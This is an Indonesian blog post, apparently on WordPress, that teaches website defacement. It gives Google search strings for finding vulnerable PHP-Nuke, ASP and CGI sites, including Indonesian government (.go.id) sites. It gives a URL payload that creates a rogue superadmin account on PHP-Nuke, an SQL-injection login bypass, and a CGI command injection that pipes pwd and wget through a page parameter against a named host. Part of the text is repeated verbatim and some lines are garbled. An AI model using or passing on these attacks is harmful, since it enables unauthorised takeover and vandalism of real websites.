Sebelumnya, kalian tau gak sih Deface itu apa?

deface

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja
server lambat dan lama-kelamaan server akan crash dan down.
Itulah yang dinamakan deface.

Nah, sekarang waktunya berbagi Tutorial Deface

Deface situs php nuke pakai google. Coba search di google:

.com/nuke/index.php atau .org/nuke/index.php

Jika sudah ditemukan targetnya, tinggal ikuti langkah berikut :

1. http://www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
2. Masukkan bug ini di belakang situs tadi : ?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
misalnya : http://www.target.com/nuke/admin.php?
http://www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_
name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.

Tapi jika berhasil, maka di url/browsing akan muncul http://www.target.com/nuke/admin.php?op=mod_author
4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi. Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.

Deface asp dengan sql injection

1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya ='”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =””> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|

Mudah kan? Kamu sudah jadi seorang defacer sekarang🙂

tapi ingat #Hacker not a destroyer 😀

1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya ='”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =””> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s